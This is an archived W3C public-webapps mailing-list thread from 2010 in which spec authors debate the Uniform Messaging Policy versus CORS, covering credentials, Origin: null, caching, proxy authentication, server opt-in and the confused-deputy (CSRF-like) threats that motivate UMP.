 (B) Every Uniform Response should also be a valid CORS response.

...with the same semantics. The goal being:
1) an UMP resource can safely and successfully return a uniform
response to a CORS API
2) a CORS resource can safely and successfully return a uniform
response to an UMP API

Given the above, a developer can read only UMP and ignore CORS and
still write safe code that works. That's what I mean by subset.

 (C) When a CORS client makes a Uniform Request and receives either a Uniform 
 Response, or an HTTP response that is neither a Uniform Response nor a 
 response would allow access under CORS rules, then the processing 
 requirements under CORS are the same as the processing requirements under UMP.

(C) seems the same as (B) if we assume both CORS and UMP properly
reject Same-Origin-only responses.

 Currently (A) and (C) do not hold. One counter-example to (A): a request that 
 contains no Origin header at all, not even Origin: null, may be a Uniform 
 Request but is not a valid CORS request.

I think it would be safe for a CORS resource to assume Origin: null
when no Origin is provided. I agree the current spec doesn't say so.

 One counter-example to (C): UMP will follow a redirect that is neither a 
 Uniform Response nor allows access under CORS; but CORS will not.

This has since been reconciled.

 I am not currently aware of any violations of (B).

(B)(2) is currently violated by the difference in response header
filtering. This can be reconciled when the current open CORS issue
about response headers is closed. It'll be interesting to see how this
issue is resolved since it is potentially very contentious. Banning
response headers seriously affects the extensibility of HTTP.

 Also, the reason the conditions on (C) are a little funny: I think it's 
 possible that a CORS implementation could make a Uniform Request that 
 receives a non-Uniform Response that nontheless allows access, but I'm 
 actually not sure if this is possible. It's definitely possible if it is 
 legal to send multiple Access-Control-Allow-Origin: headers in a response, 
 or to send Access-Control-Allow-Origin: null. I am not sure if either of 
 these is allowed. I'm also not sure if there are other possible CORS 
 responses that would violate the Uniform Request requirements or UMP 
 processing model. If there are no such conflicts, then we could tighten C to:

An UMP resource is only allowed to respond with a single
Access-Control-Allow-Origin: *. Other values are undefined by UMP and
so don't offer any defined behavior that an UMP resource can rely
upon. That's not a violation of (C) though, since (C) says the
response is either a uniform response or one rejected by both UMP and
CORS.

 (C') When a CORS client makes a Uniform Request and receives any response, 
 then the processing requirements under CORS are the same as the processing 
 requirements under UMP.

CORS defines more kinds of successful responses than does UMP, since
it supports additional values for the Access-Control-Allow-Origin
header. So (C') would be violated if a non-compliant UMP resource
responded with an Access-Control-Allow-Origin header with a value
matching the received Origin header.

 Also none of this squarely addresses your original point 1: whether a UMP 
 server would automatically be compatible with a CORS request that is *not* a 
 Uniform Request. That would require a condition something like this:

 (D) When a UMP server receives a CORS Request that is not a Uniform Request, 
 if it would have granted access to the same request with all user and server 
 credentials removed, it must process the CORS request in the same way as it 
 would if all credentials had in fact been omitted.

 I don't think 

Re: [XHR2] AnonXMLHttpRequest()

2010-02-04 Thread Tyler Close
On Wed, Feb 3, 2010 at 2:34 PM, Maciej Stachowiak m...@apple.com wrote:
 I don't think I've ever seen a Web server send Vary: Cookie. I don't know 
 offhand if they consistently send enough cache control headers to prevent 
 caching across users.

I've been doing a little poking around. Wikipedia sends Vary:
Cookie. Wikipedia additionally uses Cache-Control: private, as do
some other sites I checked. Other sites seem to be relying on
revalidation of cached entries by making them already expired.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Tue, Feb 2, 2010 at 11:37 PM, Maciej Stachowiak m...@apple.com wrote:
 I think the credentials flag should specifically affect cookies, http
 authentication, and client-side SSL certs, but not proxy authentication (or,
 obviously, Origin). Anne, can you fix this?

Perhaps the best way to fix this is to have the definition of the
credentials flag reference UMP.

I think it's worth noting that Adam Barth's review of UMP went into
significant detail on the definition of credentials, but I don't
recall him raising similar points about CORS, though they would
obviously apply. I take this as further evidence that having separate
specifications improves clarity.

 A CORS message would clearly not satisfy the declarative definition of a
 Uniform Request. Since this definition is based partly on what MUST NOT be
 included, I don't see any way to extend it.

CORS must not claim that its requests-with-credentials are uniform
requests. That would be incorrect and a violation of the UMP spec.
Instead, CORS could define its requests as
uniform-requests-plus-credentials and give this new construct a new
name. In programmer speak, CORS could extend UMP using composition
rather than inheritance.

 No existing CORS implementation will satisfy the requirements for a Uniform
 Request, as far as I can tell, since it includes information obtained
 from... the referring resource, including its origin. It is possible to
 send a request satisfying the Uniform Request requirements by passing the
 right parameters to CORS (a unique identifier origin would result in
 Origin: null being sent), so the subset relation exists at the protocol
 level. But I don't think any implementation will end up passing the right
 parameters to CORS, so the intersection of the subsets of CORS supported by
 existing implementations does not overlap the UMP subset of CORS.

If it's not possible to coax an existing implementation into sending
Origin: null, then, in the extreme, it's possible to create a newly
generated domain name and send the request from there, so that the
Origin header has a value to which no semantics are attached.

Again, I'm *not* arguing that existing CORS implementations provide a
clean and usable interface for using UMP. They clearly don't. I'm only
arguing that UMP defines functionality that existing implementations
have implicitly agreed to support, since they support sending of
semantically equivalent messages (there was never any guarantee that
the Origin header contained information that was meaningful to the
server). As you pointed out, there's still the issue of redirect
handling, but AFAICT, CORS implementations are not perfectly aligned
here either.

We should open a new thread on the redirect question, as there are
clearly issues that remain to be solved both within CORS itself and
between CORS and UMP. I'd also like the opportunity to convince the WG
that the UMP handling of redirects is the technically superior choice.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 1:00 AM, Jonas Sicking jo...@sicking.cc wrote:
 Another thing that might be worth noting is that if the UA contains a
 HTTP cache (which most popular UAs do), the UA must never use a cached
 response that was the result of a request that was made with
 credentials, when making a request without. The same goes the other
 way around.

I gather this is because sites do not reliably use the Vary header?

When processing a credential-less request, do you use a conditional
GET to validate an existing cache entry that was first retrieved over
a connection that used credentials?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 11:30 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, Feb 3, 2010 at 10:12 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, Feb 3, 2010 at 1:00 AM, Jonas Sicking jo...@sicking.cc wrote:
 Another thing that might be worth noting is that if the UA contains a
 HTTP cache (which most popular UAs do), the UA must never use a cached
 response that was the result of a request that was made with
 credentials, when making a request without. The same goes the other
 way around.

 I gather this is because sites do not reliably use the Vary header?

 I think so yes.

 When processing a credential-less request, do you use a conditional
 GET to validate an existing cache entry that was first retrieved over
 a connection that used credentials?

 The way we do it is that we use the credentials flag as part of the
 cache key, along with the url. The effect is that there's a cache used
 for normal requests, and a separate cache used for credentials
 free requests.
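
If I follow, that amounts to something like the following rough sketch (my
reading of it, not actual Gecko code):

  // The credentials flag is folded into the cache key, so an entry fetched
  // with credentials can never satisfy a credential-free request, and
  // vice versa.
  function cacheKey(url, withCredentials) {
    return (withCredentials ? "cred:" : "anon:") + url;
  }
  // cacheKey("https://example.org/data", true) !==
  // cacheKey("https://example.org/data", false)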

Do you use any special Cache-Control headers to ensure a proxy does
not respond with an entry cached from a request with credentials?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 1:32 PM, Julian Reschke julian.resc...@gmx.de wrote:
 Tyler Close wrote:

 On Wed, Feb 3, 2010 at 1:00 AM, Jonas Sicking jo...@sicking.cc wrote:

 Another thing that might be worth noting is that if the UA contains a
 HTTP cache (which most popular UAs do), the UA must never use a cached
 response that was the result of a request that was made with
 credentials, when making a request without. The same goes the other
 way around.

 I gather this is because sites do not reliably use the Vary header?

 When a shared cache (see Section 13.7) receives a request containing an
 Authorization field, it MUST NOT return the corresponding response as a
 reply to any other request, unless one of the following specific exceptions
 holds:...

 http://greenbytes.de/tech/webdav/rfc2616.html#rfc.section.14.8

AFAICT, RFC 2616 only special-cases the Authorization
header, which leaves me wondering what shared caches do for other
kinds of credentials, such as cookies or the NTLM authentication that
Jonas referred to. For example, if an origin server responds to a
request with cookies by sending a response with no Vary header and no
Cache-Control: private or other disabling of caching, would the proxy
use the response to respond to a later request without cookies? Do
proxies commonly implement a special case for the Cookie header,
similar to the Authorization header? Do origin servers commonly have
this bug?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 2:12 PM, Julian Reschke julian.resc...@gmx.de wrote:
 We know that Vary doesn't work well in practice because of all the
 bugs/shortcomings in IE.

For requests with cookies, there's an interesting tension there
between wanting to support private caching in IE, but wanting to
prevent a proxy from sharing responses with other users. Since we know
the Vary header doesn't work for this case, what's the popular
workaround? Does this workaround rely on undocumented treatment of the
Cookie header by proxies?

I'm currently thinking it would be best for UMP to specify that a
cached response can only be used if it is valid under the rules HTTP
establishes for a shared cache, rather than for a private cache. I
am concerned if this is sufficient to guard against buggy but common
use of cookies by servers, and separately, if it would result in
unnecessary cache misses.
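
Roughly, what I have in mind is the following (a sketch of the idea, not
spec text; the entry record is hypothetical):

  // Reuse a cached entry for a uniform request only if HTTP's shared-cache
  // rules would let a proxy serve that entry to an arbitrary other client.
  function reusableForUniformRequest(entry) {
    // entry: { requestHadCredentials: boolean, cacheControl: string }
    var cc = (entry.cacheControl || "").toLowerCase();
    if (cc.indexOf("private") !== -1) return false;   // single-user response
    if (entry.requestHadCredentials &&
        cc.indexOf("public") === -1 &&
        cc.indexOf("s-maxage") === -1 &&
        cc.indexOf("must-revalidate") === -1) {
      return false; // none of the RFC 2616 section 14.8 exceptions apply
    }
    return true;
  }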

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-02 Thread Tyler Close
On Sun, Jan 31, 2010 at 11:03 PM, Maciej Stachowiak m...@apple.com wrote:
 I'm curious what practical differences there are between CORS with the 
 credentials flag
 set to false and the origin set to null, and UMP. Are there any?

The credentials flag in CORS is underspecified, so it's hard to answer
this question.

Since we've all noted that CORS and UMP take a different approach to
the problem, I think it would be confusing to bundle them in a single
spec. If CORS wants to be a superset of UMP, then I think it's best to
write CORS as an extension of UMP, and so referencing UMP, rather than
absorbing it. This specification layout would also make it easier to
communicate the differences between an AnonXMLHttpRequest (or
UniformRequest) and an XHR2; each would link to their corresponding
spec document without needing to select only the relevant
sub-sections.

Since UMP is also much smaller and simpler than CORS, I think it makes
sense to push it through the standardization process at a faster pace
than CORS. For example, I think it is reasonable to move UMP to Last
Call as early as next month, or even the end of this month.

 Note: in light of the above, I think AnonXMLHttpRequest would be almost the 
 same as XDomainRequest, the only difference being that it would send Origin: 
 null instead of the sender's actual Origin.

As the UMP spec notes, it is within the intersection of what has been
commonly deployed across user-agents. I'm curious to learn Microsoft's
assessment of UMP, since, as you note, it is very close to their own
XDomainRequest.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-02 Thread Tyler Close
On Tue, Feb 2, 2010 at 5:14 PM, Maciej Stachowiak m...@apple.com wrote:

 On Feb 2, 2010, at 11:15 AM, Tyler Close wrote:

  On Sun, Jan 31, 2010 at 11:03 PM, Maciej Stachowiak m...@apple.com wrote:
  I'm curious what practical differences there are between CORS with the 
  credentials flag
  set to false and the origin set to null, and UMP. Are there any?
 
  The credentials flag in CORS is underspecified, so it's hard to answer
  this question.

 Can you be more specific? What is underspecified about it? Sounds like 
 something we should fix.

Nowhere does CORS define what a credential is. Nowhere does it list
specific credentials a browser may have but should not use when the
credential flag is false. Does CORS treat the Origin header as a
credential? What other identifiers are not credentials? What about
proxy credentials?

  Since we've all noted that CORS and UMP take a different approach to
  the problem, I think it would be confusing to bundle them in a single
  spec. If CORS wants to be a superset of UMP, then I think it's best to
  write CORS as an extension of UMP, and so referencing UMP, rather than
  absorbing it. This specification layout would also make it easier to
  communicate the differences between an AnonXMLHttpRequest (or
  UniformRequest) and an XHR2; each would link to their corresponding
  spec document without needing to select only the relevant
  sub-sections.

 CORS algorithms are parameterized, so API specs don't have to link to a 
 specific section, just define the input parameters.

This is far more confusing than just linking to the corresponding
spec. There's too much extra information that only serves to confuse.
The UMP spec will be consumed not just by API spec writers, but also
by Web application developers.

 Does UMP have extension hooks sufficient to allow CORS to be written as a UMP 
 extension as you suggest?

UMP has a declarative specification. You extend UMP the same way you
extend other HTTP-based protocols, by defining new protocol tokens and
attaching semantics to them. For example, CORS would define new
semantics for new values of the Access-Control-Allow-Origin header.
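
As a sketch of that layering (my reading, not spec text):

  // A uniform client attaches semantics only to the wildcard token; any
  // other value is extension territory (for example CORS) and gives a
  // uniform client no defined behavior to rely on.
  function uniformAccessGranted(allowOriginValue) {
    return allowOriginValue === "*";
  }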

  Since UMP is also much smaller and simpler than CORS, I think it makes
  sense to push it through the standardization process at a faster pace
  than CORS. For example, I think it is reasonable to move UMP to Last
  Call as early as next month, or even the end of this month.

 I'm not sure this makes sense if we want to maintain the subset relation.

I don't follow, why does maintaining the subset relation preclude Last
Call for UMP? It seems quite unfair for the maturity of the UMP
specification to be held hostage by the CORS specification when UMP
has no dependency on CORS.

 And if we don't want to maintain the subset relation, then I would oppose 
 advancing UMP at all.

 
  Note: in light of the above, I think AnonXMLHttpRequest would be almost 
  the same as XDomainRequest, the only difference being that it would send 
  Origin: null instead of the sender's actual Origin.
 
  As the UMP spec notes, it is within the intersection of what has been
  commonly deployed across user-agents. I'm curious to learn Microsoft's
  assessment of UMP, since, as you note, it is very close to their own
  XDomainRequest.

 Actually, it's not within the intersection, since it requires Origin: null 
 rather than the actual Origin. No user agent currently has an API that 
 generates UMP-conformant requests.

As you said above, there is a subset relation between CORS and UMP,
which puts UMP in the intersection of existing CORS implementations.

With some awkward messing around with iframes and such, I think the
existing implementations can be made to put a non-meaningful
identifier in the Origin header. Not a situation I'd want to work with
going forward, but good enough to claim the intersection.

--Tyler

--
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-14 Thread Tyler Close
On Tue, Jan 12, 2010 at 5:34 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 4:24 PM, Mark S. Miller erig...@google.com wrote:
 The most it can do is ignore such information. It is up to the
 client not to provide such information. It is the job of the standard to
 require the client not to provide it, and to inform server-side authors not
 to expect it.

 Right, but we're working in a threat model where ambient authority is
 confusing to servers and causes them to have vulnerabilities.  If the
 server is smart enough to understand the dangers of ambient authority,
 then we don't need UMP.  CORS would be sufficient.

The client-side requires the UMP restrictions. When a client is about
to send off a request, it doesn't yet know whether or not the server
will ignore the client's ambient authority. To ensure that it must,
the request delivered to the server contains no credentials.

On the server-side, a resource implemented to the UMP security model
doesn't expect requests to bear credentials, since clients are not
expected to send them. There shouldn't be any code branches on the
server-side that are conditional upon receiving credentials.
Consequently, if a malicious client does send credentials, these have
no impact on processing of the request.
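
For concreteness, a minimal sketch of such a resource; the unguessable-token
check is just one illustration of deciding access without credentials, not
something the draft mandates:

  // Deliberately no branch on request.headers.cookie or any Authorization
  // value: attaching credentials changes nothing.
  var issuedTokens = { "/report/42": "unguessable-token-issued-out-of-band" };
  function handle(request) { // request: { path, query: { key }, headers }
    if (!request.query || request.query.key !== issuedTokens[request.path]) {
      return { status: 403, body: "" };
    }
    return {
      status: 200,
      headers: { "Access-Control-Allow-Origin": "*" },
      body: "{\"ok\":true}"
    };
  }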

 On Tue, Jan 12, 2010 at 4:56 PM, Tyler Close tyler.cl...@gmail.com wrote:
 UMP supports confidentiality where client and server desire
 confidentiality.

 My question, then, is how can a server enjoy the confidentiality
 benefits of UMP without paying the security costs of CORS?

By neither issuing, nor accepting client credentials, so that clients
can access the server's resources without being vulnerable to CSRF
attacks that would break confidentiality.

The confidentiality of a resource can be compromised by a CSRF
vulnerability in a legitimate client. A server can avoid this loss of
confidentiality by providing its clients a security model that is not
vulnerable to CSRF. UMP provides this security model.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-14 Thread Tyler Close
On Thu, Jan 14, 2010 at 11:34 AM, Adam Barth w...@adambarth.com wrote:
 On Thu, Jan 14, 2010 at 9:20 AM, Tyler Close tyler.cl...@gmail.com wrote:
 The confidentiality of a resource can be compromised by a CSRF
 vulnerability in a legitimate client.

 Can you define what you mean by CSRF?  I think we must have different
 ideas about what the term means because I don't understand that
 sentence.

I should have said CSRF-like, by which I mean a Confused Deputy
attack. I've been using the former term since some people find it
easier to understand.

For example, imagine a client using a third-party storage service. To
copy data from one file to another, they do a GET on one URL for the
source file, followed by a POST to another for the destination file.
If the storage service is an attacker, it could tell the client the
source file's URL is the URL for a resource the client can read, but
the storage server cannot. The confidentiality of this resource is
then compromised by a legitimate client that fell victim to a
CSRF-like attack.
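
A sketch of that copy operation (URLs and API use illustrative):

  // When the user-agent silently attaches the user's credentials to the GET,
  // an attacker-chosen sourceUrl lets the storage service read data it could
  // not fetch itself: the confidential body is echoed back in the POST.
  function copy(sourceUrl, destUrl) {
    var get = new XMLHttpRequest();
    get.open("GET", sourceUrl);
    get.onload = function () {
      var post = new XMLHttpRequest();
      post.open("POST", destUrl);
      post.send(get.responseText); // the confidential source leaks here
    };
    get.send();
  }
  // Under UMP neither request carries the user's credentials, so naming a
  // credential-protected source gains the attacker nothing.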

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-12 Thread Tyler Close
On Mon, Jan 11, 2010 at 5:06 PM, Adam Barth w...@adambarth.com wrote:
 On Mon, Jan 11, 2010 at 12:40 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Sun, Jan 10, 2010 at 2:25 PM, Adam Barth w...@adambarth.com wrote:
 More abstractly, why aren't we worrying about P misbehaving based on
 the ambient authority in R (i.e., the Proxy-Authentication
 information)?  Why do the security considerations for the
 Proxy-Authorization header differ from the security considerations for
 the Authorization header?

 The resource host decides whether or not to accept a request, what
 side-effects are caused, and what information is put in the response.
 We want to prevent ambient authority from having an effect on these
 decisions by the resource host.

 I'm not sure why we're concerned about misuses of ambient authority by
 the resource host but not by the proxy.  If we can trust one to
 operate correctly, why can't we trust the other?

The proxy is only in a position to affect network connectivity,
especially for https: resources where SSL ensures this property.
Similar to client IP address and firewall issues, the UMP is not in a
position to affect access-control decisions based on network
connectivity. The UMP can affect decisions based on credentials issued
by a site to a client and these are the most interesting anyways,
since these are the ones that resources on the public Web commonly
depend upon. The UMP is a tool to help resource authors. A resource
author is not commonly in a position to require use of an
authenticating HTTP proxy.

 The proxy is presumably semantically
 transparent and so has no impact on these decisions by the resource
 host. For https: resources, this transparency is cryptographically
 enforced by the SSL protocol, which tunnels the connection through the
 proxy.

 This seems like a shaky assumption.  For example, imagine a private
 network that allows VPN access via an authenticating proxy.

What security properties are you claiming for this setup?

  Now, the
 ambient authority provided by Proxy-Authentication embues the attacker
 with the ability to issue UMP requests inside the VPN.

The form element and others already embue the attacker with greater access to
VPN resources, since issued credentials are also included.

 It just seems like the reason for preferring UMP over CORS is that
 we're worried that ambient authority will lead to security
 vulnerabilities.  If that's really a problem, we should remove all
 ambient authority.

Does the first clause of your last sentence imply that you don't
believe CSRF, clickjacking and related attacks are really problems?

It's not feasible to remove all ambient authority. For example, the
client has the authority to send requests from its IP address. So we
draw a line between network connectivity and issued credentials. Proxy
credentials provide network connectivity.

Also, as a practical matter, disallowing Proxy-Authorization might
inhibit use of UMP, since a resource author would be concerned about
the loss of users who are required to use a proxy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 12:29 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 10:51 AM, Tyler Close tyler.cl...@gmail.com wrote:
 It's not feasible to remove all ambient authority. For example, the
 client has the authority to send requests from its IP address. So we
 draw a line between network connectivity and issued credentials. Proxy
 credentials provide network connectivity.

 Also, as a practical matter, disallowing Proxy-Authorization might
 inhibit use of UMP, since a resource author would be concerned about
 the loss of users who are required to use a proxy.

 RIght, this is the essential point: whether we should remove a piece
 of ambient authority is a risk management decision.  Instead of
 dogmatically stomping out all forms of ambient authority,

Are you really accusing me of being dogmatic, or is this just more of
your hyperbole? Your arguments are frequently misleading because their
reasoning relies upon your use of hyperbole. In this case, by
characterizing my argument as dogma, you avoid addressing the
distinction I've drawn between network connectivity and credentials
issued by a resource host. I think it's a principled and useful
distinction and have explained why. Instead of logic, you respond with
hyperbole.

 we ought to
 weigh the costs of removing the authority (in this case compatibility
 issues with existing proxy deployments) with the benefits (greater
 resilience to a class of vulnerabilities).

Absolutely, and I and others commonly do so. For example, the Caja
language also gives careful consideration to what permissions are
ambiently available to Caja objects. In Caja, permission to consume
memory and CPU cycles is ambiently available to objects within a
particular Caja container. This makes a Caja container vulnerable to
DOS attack by a Caja object in that container. Similarly, the UMP
makes network connectivity ambiently available to clients that are
able to issue network requests. Just as Caja deems it too awkward to
deal with DOS at the granularity of individual objects, UMP deems it
too awkward to deal with network connectivity at the granularity of
individual requestors within a user-agent instance. In both cases, the
issues can be addressed at a coarser level of granularity, by
respectively placing memory limits on the Caja container, or not
giving proxy credentials to the user-agent instance.

 The reason we have different beliefs about whether CORS or UMP is a
 better protocol is because we perceve the risks and rewards
 differently.

I wish that were true. It would make for a more productive discussion.

  Ultimately, authors are in a better position to weigh
 these factors than we are, which is why we should provide both APIs.

One of the problems here is that authors don't get to choose the
security model for their code, but are constrained by the choice made
by resources that they interact with. If you host a resource that uses
the CORS security model, then my client code must work within that
model. This is especially onerous, since under the CORS model, it is
the client code that is vulnerable to CSRF-like attacks, not the
target resource. In other words, if you choose the CORS model, then
any CSRF-like vulnerabilities in my client code are my problem, even
though the CORS model doesn't provide me a way to feasibly defend
myself against these vulnerabilities.

The security model is contagious. Even if we put out two APIs, one
will become dominant. Hopefully the continued lack of cookies in
XDomainRequest will sufficiently predispose the market towards UMP, so
the confusion caused by standardizing two security models will
ultimately have little effect.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
I believe all three protocols attach the same semantics to the
Access-Control-Allow-Origin: * response header sent in response to a
GET or POST request. Unless you know of a significant difference in
the semantics, breaking compatibility seems unwarranted.
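
As a sketch of that compatibility (URL illustrative):

  // The same wildcard response already serves both deployed cross-origin
  // APIs; a separate opt-in header would break that compatibility.
  function fetchData(onText) {
    if (window.XDomainRequest) {            // IE8
      var xdr = new XDomainRequest();
      xdr.open("GET", "https://api.example.org/data");
      xdr.onload = function () { onText(xdr.responseText); };
      xdr.send();
    } else {                                // CORS-capable XMLHttpRequest
      var xhr = new XMLHttpRequest();
      xhr.open("GET", "https://api.example.org/data");
      xhr.onload = function () { onText(xhr.responseText); };
      xhr.send();
    }
  }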

--Tyler

On Tue, Jan 12, 2010 at 12:54 PM, Adam Barth aba...@webkit.org wrote:
 In the current draft of UMP, the client can opt-in to UMP by choosing
 to use the UniformMessaging API, but the server is unable to force
 clients to use UMP because the way the server opts into the protocol
 is by returning the Access-Control-Allow-Origin header.
 Unfortunately, when the server returns the Access-Control-Allow-Origin
 header, the server also opts into the CORS and XDomainRequest
 protocols.  The server operator might be reticent to opt into these
 protocols if he or she is worried about ambient authority.

 I recommend using a new header, like Allow-Uniform-Messages: level-1
 so that servers can opt into UMP specifically.

 Adam




-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 2:44 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 2:19 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 12:54 PM, Adam Barth aba...@webkit.org wrote:
 In the current draft of UMP, the client can opt-in to UMP by choosing
 to use the UniformMessaging API, but the server is unable to force
 clients to use UMP because the way the server opts into the protocol
 is by returning the Access-Control-Allow-Origin header.
 Unfortunately, when the server returns the Access-Control-Allow-Origin
 header, the server also opts into the CORS and XDomainRequest
 protocols.  The server operator might be reticent to opt into these
 protocols if he or she is worried about ambient authority.

 I recommend using a new header, like Allow-Uniform-Messages: level-1
 so that servers can opt into UMP specifically.

 I believe all three protocols attach the same semantics to the
 Access-Control-Allow-Origin: * response header sent in response to a
 GET or POST request. Unless you know of a significant difference in
 the semantics, breaking compatibility seems unwarranted.

 Let me phrase my question another way.  Suppose the following situation:

 1) I'm a server operator and I want to provide a resource to other web sites.
 2) I've been reading public-webapps and I'm concerned about the
 ambient authority in CORS.

 How can I share my resource with other web sites and enjoy the
 security benefits of UMP?

Follow the advice given in the Security Considerations section of
the UMP spec:

http://dev.w3.org/2006/waf/UMP/#security

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 2:57 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 2:47 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 2:44 PM, Adam Barth w...@adambarth.com wrote:
 Let me phrase my question another way.  Suppose the following situation:

 1) I'm a server operator and I want to provide a resource to other web 
 sites.
 2) I've been reading public-webapps and I'm concerned about the
 ambient authority in CORS.

 How can I share my resource with other web sites and enjoy the
 security benefits of UMP?

 Follow the advice given in the Security Considerations section of
 the UMP spec:

 http://dev.w3.org/2006/waf/UMP/#security

 As a server operator, why can't I follow that advice with CORS?

You can.

 Nothing there seems specific to UMP.

UMP is more restrictive on the server than is CORS. UMP doesn't make
the client's ambient authority visible to the server.

 I don't understand how UMP is helping server operators deal with the
 risks of ambient authority.  When a server operator makes a resource
 available via UMP, they're also making it available to CORS with it's
 attendant security model.

UMP is helping server operators define APIs that enable their clients
to defend themselves against CSRF-like vulnerabilities. A CSRF-like
attack takes place on the client-side, not the server-side. The
server's behavior needs to be restricted in a way that enables the
client to communicate its wishes, while defending itself against CSRF.
In particular, the client must be able to make a request without
applying its credentials to the request, so the server must handle the
request without demanding credentials be provided.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CfC: to publish First Public Working Draft of Uniform Messaging Policy spec; deadline January 19

2010-01-12 Thread Tyler Close
support

On Tue, Jan 12, 2010 at 3:29 PM, Arthur Barstow art.bars...@nokia.com wrote:
 This is a Call for Consensus (CfC) to publish the First Public Working Draft
 (FPWD) of the Uniform Messaging Policy (UMP) spec, latest Editor's Draft at:

  http://dev.w3.org/2006/waf/UMP/

 This CfC satisfies the group's requirement to record the group's decision
 to request advancement.

 By publishing this FPWD, the group sends a signal to the community to begin
 reviewing the document. The FPWD reflects where the group is on this spec at
 the time of publication; it does not necessarily mean there is consensus on
 the spec's contents.

 As with all of our CfCs, positive response is preferred and encouraged and
 silence will be assumed to be assent.

 The deadline for comments is January 19.

 -Art Barstow

 Begin forwarded message:

 From: ext Tyler Close tyler.cl...@gmail.com
 Date: January 7, 2010 8:21:10 PM EST
 To: public-webapps public-webapps@w3.org
 Subject: [UMP] A declarative version of Uniform Messaging Policy
 Archived-At:
 http://www.w3.org/mid/5691356f1001071721k3ca16400qe5a2f4d6d966c...@mail.gmail.com

 I've updated the UMP spec to use a declarative style and moved the
 algorithmic specification to a non-normative appendix. Hopefully this
 organization will appeal to fans of either style. See:

 http://dev.w3.org/2006/waf/UMP/

 I'm hoping to move UMP forward to FPWD as soon as possible. Please let
 me know if there is anything I need to do to expedite this process.

 Thanks,
 --Tyler






-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CfC: to publish First Public Working Draft of Uniform Messaging Policy spec; deadline January 19

2010-01-12 Thread Tyler Close
Hi Jonas,

I too like the subset relationship between UMP and CORS and hope to
retain it. AFAIK, the only issue here is whether or not the user-agent
can follow a non-uniform redirect. There are two ways to resolve this:
UMP forbids following or CORS enables following. Is there any chance
of the latter?

--Tyler

On Tue, Jan 12, 2010 at 4:03 PM, Jonas Sicking jo...@sicking.cc wrote:
 I support this.

 For the record: I have admittedly not been following the recent
 discussions, but some of it has worried me a bit. I liked how UMP was
 originally a subset of CORS, in that it gave some amount of
 compatibility between the two models. In particular the ability for a
 UMP client to talk to a CORS server seems like a win for both specs. I
 also believe it makes switching between the two models slightly
 easier, which again I think is a win for all involved parties.

 If that is no longer the case, I hope that we'll end up back there.

 In any case, whatever the state is I support the publication of this
 FPWD. And please do keep technical discussions in the existing threads
 (and new ones of course). I just wanted to raise some technical
 concerns so that no one misunderstood what my support for the FPWD
 meant.

 / Jonas

 On Tue, Jan 12, 2010 at 3:29 PM, Arthur Barstow art.bars...@nokia.com wrote:
 This is a Call for Consensus (CfC) to publish the First Public Working Draft
 (FPWD) of the Uniform Messaging Policy (UMP) spec, latest Editor's Draft at:

  http://dev.w3.org/2006/waf/UMP/

 This CfC satisfies the group's requirement to record the group's decision
 to request advancement.

 By publishing this FPWD, the group sends a signal to the community to begin
 reviewing the document. The FPWD reflects where the group is on this spec at
 the time of publication; it does not necessarily mean there is consensus on
 the spec's contents.

 As with all of our CfCs, positive response is preferred and encouraged and
 silence will be assumed to be assent.

 The deadline for comments is January 19.

 -Art Barstow

 Begin forwarded message:

 From: ext Tyler Close tyler.cl...@gmail.com
 Date: January 7, 2010 8:21:10 PM EST
 To: public-webapps public-webapps@w3.org
 Subject: [UMP] A declarative version of Uniform Messaging Policy
 Archived-At:
 http://www.w3.org/mid/5691356f1001071721k3ca16400qe5a2f4d6d966c...@mail.gmail.com

 I've updated the UMP spec to use a declarative style and moved the
